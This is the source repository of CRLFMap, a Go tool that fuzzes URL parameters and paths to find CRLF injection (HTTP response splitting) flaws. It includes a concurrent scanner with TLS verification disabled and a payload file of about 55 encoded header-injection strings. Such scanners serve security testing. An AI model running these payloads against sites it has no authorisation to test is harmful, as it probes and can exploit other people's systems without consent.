├── .gitignore ├── LICENSE ├── README.md ├── cmd ├── root.go └── scan.go ├── main.go └── payloads.txt /.gitignore: -------------------------------------------------------------------------------- 1 | domains.txt 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Ryan D'Amour 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CRLFMap 2 | 3 | CRLFMap is a tool to find HTTP Splitting vulnerabilities 4 | 5 | ## Why? 
6 | - I wanted to write a tool in Golang for concurrency 7 | - I wanted to be able to fuzz _both_ parameters and paths 8 | 9 | ## Installation 10 | 11 | ```bash 12 | go get github.com/ryandamour/crlfmap 13 | ``` 14 | 15 | ## Help 16 | ```bash 17 | Available Commands: 18 | help Help about any command 19 | scan A scanner for all your CRLF needs 20 | 21 | Flags: 22 | -h, --help help for crlfmap 23 | ``` 24 | 25 | ## `scan` usage 26 | 27 | ```bash 28 | crlfmap scan --domains domains.txt --output results.txt 29 | 30 | =============================================================== 31 | CRLFMap v0.0.1 32 | by Ryan D'Amour @ryandamour 33 | =============================================================== 34 | _ __ 35 | | |/ _| 36 | ___ _ __| | |_ _ __ ___ __ _ _ __ 37 | / __| '__| | _| '_ ' _ \/ _' | '_ \ 38 | | (__| | | | | | | | | | | (_| | |_) | 39 | \___|_| |_|_| |_| |_| |_|\__,_| .__/ 40 | | | 41 | |_| 42 | 43 | v0.0.1 44 | ----------------------- 45 | :: Domains : domains.txt 46 | :: Payloads : payloads.txt 47 | :: Threads : 1 48 | :: Output : results.txt 49 | :: User Agent : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 50 | :: Timeout : 10 51 | :: Delay : 0 52 | ----------------------- 53 | [+]http://localhost:3000/v1/%0AInjected-Header:CRLFInjecttest.json: is Vulnerable 54 | [+]http://localhost:3000/v1/%20%0AInjected-Header:CRLFInjecttest.json: is Vulnerable 55 | ``` 56 | 57 | ## Contributing 58 | Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change. 59 | 60 | Please make sure to update tests as appropriate. 
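61 | 62 | ## License 63 | [MIT](https://choosealicense.com/licenses/mit/) 64 | 
--------------------------------------------------------------------------------
/cmd/root.go:
--------------------------------------------------------------------------------
package cmd

import (
	"context"
	"fmt"
	"os"
	"os/signal"

	"github.com/spf13/cobra"
)

// mainContext is created by Execute and cancelled when Execute returns or an
// interrupt signal is received.
var mainContext context.Context

// rootCmd is the top-level "crlfmap" command; sub-commands register on it
// from their own init functions.
var rootCmd = &cobra.Command{
	Use:          "crlfmap",
	SilenceUsage: true,
}

// Execute runs the root command. It installs an os.Interrupt handler that
// prints a notice and exits with status 1, and it exits with status 1 when
// the command itself returns an error.
func Execute() {
	var cancel context.CancelFunc
	mainContext, cancel = context.WithCancel(context.Background())

	signalChan := make(chan os.Signal, 1)
	signal.Notify(signalChan, os.Interrupt)
	// One deferred cleanup is enough: stop signal delivery, then release the
	// context (the original deferred cancel twice).
	defer func() {
		signal.Stop(signalChan)
		cancel()
	}()
	go func() {
		select {
		case <-signalChan:
			// caught CTRL+C
			fmt.Println("\n[!] Keyboard interrupt detected, terminating.")
			cancel()
			os.Exit(1)
		case <-mainContext.Done():
		}
	}()

	if err := rootCmd.Execute(); err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
}

// init prints the program banner at package load time.
func init() {
	fmt.Print(`===============================================================
CRLFMap v0.0.1
by Ryan D'Amour @ryandamour
===============================================================`)
}

// er prints msg prefixed with "Error:" and exits with status 1.
func er(msg interface{}) {
	fmt.Println("Error:", msg)
	os.Exit(1)
}
--------------------------------------------------------------------------------
/cmd/scan.go:
--------------------------------------------------------------------------------
package cmd

import (
	"bufio"
	"crypto/tls"
	"fmt"
	"log"
	"net/http"
	"net/url"
	"os"
	"strings"
	"sync"
	"time"

	"github.com/cheggaaa/pb/v3"
	"github.com/spf13/cobra"
)

// Flag-backed settings for the scan command.
var (
	domains   string
	payloads  string
	output    string
	userAgent string
	timeout   int
	threads   int
	delay     int
	verbose   bool
	version   = "v0.0.1"

	// outputMu serialises appends to the results file, because several
	// makeRequest goroutines can report a finding at the same time.
	outputMu sync.Mutex
)

// injectedHeader is the response header name the payloads try to introduce.
// It is already in canonical MIME form, which is how net/http stores the keys
// of Response.Header.
const injectedHeader = "Injected-Header"

// crlfMapCmd builds the "scan" sub-command and binds its flags to the
// package-level settings above.
func crlfMapCmd() *cobra.Command {
	scanCmd := &cobra.Command{
		Use:   "scan",
		Short: "A scanner for all your CRLF needs",
		Run:   crlfMapFunc,
	}

	flags := scanCmd.Flags()
	flags.StringVarP(&domains, "domains", "d", "", "Location of domains with parameters to scan")
	flags.StringVarP(&payloads, "payloads", "p", "payloads.txt", "Location of payloads to generate on requests")
	flags.StringVarP(&output, "output", "o", "", "Location to save results")
	flags.StringVarP(&userAgent, "user-agent", "u", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "User agent for requests")
	flags.IntVarP(&timeout, "timeout", "", 10, "The amount of time needed to close a connection that could be hung")
	flags.IntVarP(&delay, "delay", "", 0, "The time each threads waits between requests in milliseconds")
	flags.IntVarP(&threads, "threads", "t", 1, "Number of threads to run crlfmap on")
	flags.BoolVarP(&verbose, "verbose", "v", false, "verbose output")

	// MarkFlagRequired only fails when the flag name is unknown; surface that
	// instead of silently running without the requirement.
	if err := scanCmd.MarkFlagRequired("domains"); err != nil {
		er(err)
	}

	return scanCmd
}

// crlfMapFunc is the Run handler of the scan command. It prints the effective
// settings, reads the target and payload lists, and requests every URL that
// fuzzURL derives from each (target, payload) pair.
//
// At most `threads` requests are in flight at once and every derived URL is
// requested exactly once. The previous loop waited on the WaitGroup after each
// goroutine it started and repeated the whole URL list once per thread, so
// raising --threads only multiplied the traffic sent to each target.
func crlfMapFunc(cmd *cobra.Command, args []string) {
	fmt.Printf(`
_ __
| |/ _|
___ _ __| | |_ _ __ ___ __ _ _ __
/ __| '__| | _| '_ ' _ \/ _' | '_ \
| (__| | | | | | | | | | | (_| | |_) |
\___|_| |_|_| |_| |_| |_|\__,_| .__/
| |
|_|

%s
-----------------------
:: Domains : %s
:: Payloads : %s
:: Threads : %d
:: Output : %s
:: User Agent : %s
:: Timeout : %d
:: Delay : %d
-----------------------
`, version, domains, payloads, threads, output, userAgent, timeout, delay)

	if threads <= 0 {
		fmt.Println("Threads must be larger than 0")
		os.Exit(1)
	}

	payloadsFile := fileReader(payloads)
	domainsFile := fileReader(domains)

	// The bar counts (target, payload) pairs, which is the total it is
	// created with; it is only drawn when verbose output is off.
	progressBar := pb.New(len(domainsFile) * len(payloadsFile))
	if !verbose {
		progressBar.Start()
	}

	var wg sync.WaitGroup
	slots := make(chan struct{}, threads) // bounds the number of in-flight requests
	pause := time.Duration(delay) * time.Millisecond

	for _, domain := range domainsFile {
		for _, payload := range payloadsFile {
			for _, requestURI := range *fuzzURL(domain, payload) {
				slots <- struct{}{}
				wg.Add(1)
				go func(uri string) {
					defer func() { <-slots }()
					makeRequest(uri, timeout, &wg)
				}(requestURI)
				if pause > 0 {
					time.Sleep(pause)
				}
			}
			progressBar.Increment()
		}
	}
	wg.Wait()
	progressBar.Finish()
}

// fuzzURL returns the URLs derived from domain by inserting payload at one
// position at a time: once per query-string segment (when a query string is
// present) and once after each "/" of the path.
//
// The query string is split into parameters with the "&" separators kept as
// their own segments, and the payload is appended to each segment in turn,
// separators included, exactly as the original implementation did. Path
// variants are rebuilt from scheme, host and path only, so they carry no
// query string.
//
// A target that url.Parse rejects is reported on stderr and contributes only
// its query-string variants; it no longer panics and aborts the whole run.
func fuzzURL(domain string, payload string) *[]string {
	var fuzzedURL []string

	// SplitN keeps everything after the first "?" as the query string; a
	// plain Split dropped whatever followed a second "?".
	if parts := strings.SplitN(domain, "?", 2); len(parts) == 2 {
		prefix := parts[0] + "?"
		params := strings.Split(parts[1], "&")

		segments := make([]string, 0, 2*len(params))
		for i, param := range params {
			if i > 0 {
				segments = append(segments, "&")
			}
			segments = append(segments, param)
		}

		// Change one segment per URL so the other parameters keep the values
		// the endpoint expects.
		for i := range segments {
			mutated := make([]string, len(segments))
			copy(mutated, segments)
			mutated[i] += payload
			fuzzedURL = append(fuzzedURL, prefix+strings.Join(mutated, ""))
		}
	}

	// Path variants are kept separate from the parameter variants.
	u, err := url.Parse(domain)
	if err != nil {
		fmt.Fprintf(os.Stderr, "skipping path variants for %q: %v\n", domain, err)
		return &fuzzedURL
	}

	for n := 1; n <= strings.Count(u.Path, "/"); n++ {
		fuzzedPath := replaceNth(u.Path, "/", "/"+payload, n)
		fuzzedURL = append(fuzzedURL, u.Scheme+"://"+u.Host+fuzzedPath)
	}

	return &fuzzedURL
}

// replaceNth returns s with the n-th (1-based) occurrence of old replaced by
// repl. s is returned unchanged when it has fewer than n occurrences.
func replaceNth(s, old, repl string, n int) string {
	i := 0
	for m := 1; m <= n; m++ {
		x := strings.Index(s[i:], old)
		if x < 0 {
			break
		}
		i += x
		if m == n {
			return s[:i] + repl + s[i+len(old):]
		}
		i += len(old)
	}
	return s
}

// fileReader returns the lines of the file at ulist. Lines that are empty or
// whitespace-only are skipped; all other lines are returned unmodified. Any
// open or read error terminates the program through log.Fatal.
func fileReader(ulist string) []string {
	var buffer []string
	file, err := os.Open(ulist)
	if err != nil {
		log.Fatal(err)
	}
	defer file.Close()

	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		line := scanner.Text()
		if strings.TrimSpace(line) == "" {
			// A blank entry would only re-request the unmodified target.
			continue
		}
		buffer = append(buffer, line)
	}
	if err := scanner.Err(); err != nil {
		log.Fatal(err)
	}
	return buffer
}

// appendFinding appends finding as one line to the results file at path,
// creating the file when needed. New files are created owner-only (0600)
// because the list of affected URLs is sensitive. The handle is closed on
// every path and the first error is returned.
func appendFinding(path, finding string) error {
	outputMu.Lock()
	defer outputMu.Unlock()

	f, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0600)
	if err != nil {
		return err
	}
	if _, err := f.WriteString(finding + "\n"); err != nil {
		f.Close()
		return err
	}
	return f.Close()
}

// makeRequest sends one GET request to uri with a timeout of timeoutFlag
// seconds, without following redirects, and reports the URL when the response
// carries the Injected-Header header. It calls wg.Done when it returns.
//
// Only the presence of the header is checked, so a reported URL is a
// candidate that still needs manual confirmation. Request errors are printed
// in verbose mode only; a failure to record a finding is always printed to
// stderr, since it would otherwise be lost.
func makeRequest(uri string, timeoutFlag int, wg *sync.WaitGroup) {
	defer wg.Done()

	client := &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			// Inspect the first response itself rather than a redirect target.
			return http.ErrUseLastResponse
		},
		Timeout: time.Duration(timeoutFlag) * time.Second,
		Transport: &http.Transport{
			MaxIdleConns:        100,
			MaxIdleConnsPerHost: 100,
			TLSClientConfig: &tls.Config{
				// Certificate verification is disabled so that hosts with
				// self-signed or expired certificates can still be checked.
				// The peer is therefore unauthenticated: this client must not
				// be reused to send credentials or other sensitive data.
				InsecureSkipVerify: true,
			},
		},
	}
	// A transport is built per call; release its idle connections so they do
	// not accumulate over a long run.
	defer client.CloseIdleConnections()

	req, err := http.NewRequest("GET", uri, nil)
	if err != nil {
		if verbose {
			fmt.Println(err)
		}
		return
	}
	req.Header.Set("User-Agent", userAgent)

	resp, err := client.Do(req)
	if err != nil {
		// Reported once, and only in verbose mode; the original also printed
		// the error unconditionally just before this check.
		if verbose {
			fmt.Println(err)
		}
		return
	}
	defer resp.Body.Close()

	if verbose {
		fmt.Printf("%s (Status : %d)\n", uri, resp.StatusCode)
	}

	if _, found := resp.Header[injectedHeader]; !found {
		return
	}

	if output != "" {
		if err := appendFinding(output, uri); err != nil {
			fmt.Fprintln(os.Stderr, "writing result:", err)
		}
	}
	fmt.Println("[+]" + uri + ": is Vulnerable")
}

// init registers the scan command on the root command.
func init() {
	rootCmd.AddCommand(crlfMapCmd())
}
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
package main

import "github.com/ryandamour/crlfmap/cmd"

// main hands control to the cobra command tree.
func main() {
	cmd.Execute()
}
--------------------------------------------------------------------------------
/payloads.txt:
--------------------------------------------------------------------------------
1 | 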
%0AInjected-Header:CRLFInject 2 | %0A%20Injected-Header:CRLFInject 3 | %20%0AInjected-Header:CRLFInject 4 | %23%OAInjected-Header:CRLFInject 5 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 6 | %E5%98%8A%E5%98%8D%0AInjected-Header:CRLFInject 7 | %3F%0AInjected-Header:CRLFInject 8 | %0AInjected-Header:CRLFInject 9 | %0A%20Injected-Header:CRLFInject 10 | %20%0AInjected-Header:CRLFInject 11 | %23%OAInjected-Header:CRLFInject 12 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 13 | %E5%98%8A%E5%98%8D%0AInjected-Header:CRLFInject 14 | %3F%0AInjected-Header:CRLFInject 15 | %0DInjected-Header:CRLFInject 16 | %0D%20Injected-Header:CRLFInject 17 | %20%0DInjected-Header:CRLFInject 18 | %23%0DInjected-Header:CRLFInject 19 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 20 | %E5%98%8A%E5%98%8D%0DInjected-Header:CRLFInject 21 | %3F%0DInjected-Header:CRLFInject 22 | %0DInjected-Header:CRLFInject 23 | %0D%20Injected-Header:CRLFInject 24 | %20%0DInjected-Header:CRLFInject 25 | %23%0DInjected-Header:CRLFInject 26 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 27 | %E5%98%8A%E5%98%8D%0DInjected-Header:CRLFInject 28 | %3F%0DInjected-Header:CRLFInject 29 | %0D%0AInjected-Header:CRLFInject 30 | %0D%0A%20Injected-Header:CRLFInject 31 | %20%0D%0AInjected-Header:CRLFInject 32 | %23%0D%0AInjected-Header:CRLFInject 33 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 34 | %E5%98%8A%E5%98%8D%0D%0AInjected-Header:CRLFInject 35 | %3F%0D%0AInjected-Header:CRLFInject 36 | %0D%0AInjected-Header:CRLFInject 37 | %0D%0A%20Injected-Header:CRLFInject 38 | %20%0D%0AInjected-Header:CRLFInject 39 | %23%0D%0AInjected-Header:CRLFInject 40 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 41 | %E5%98%8A%E5%98%8D%0D%0AInjected-Header:CRLFInject 42 | %3F%0D%0AInjected-Header:CRLFInject 43 | %0D%0A%09Injected-Header:CRLFInject 44 | %0D%0A%09Injected-Header:CRLFInject 45 | %250AInjected-Header:CRLFInject 46 | %25250AInjected-Header:CRLFInject 47 | %%0A0AInjected-Header:CRLFInject 48 | %25%30AInjected-Header:CRLFInject 
49 | %25%30%61Injected-Header:CRLFInject 50 | %u000AInjected-Header:CRLFInject 51 | %2F%2E%2E%0D%0AInjected-Header:CRLFInject 52 | %2E%2E%2F%0D%0AInjected-Header:CRLFInject 53 | %2F..%0D%0AInjected-Header:CRLFInject 54 | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Injected-Header:CRLFInject 55 | - *Injected-Header:CRLFInject 56 | --------------------------------------------------------------------------------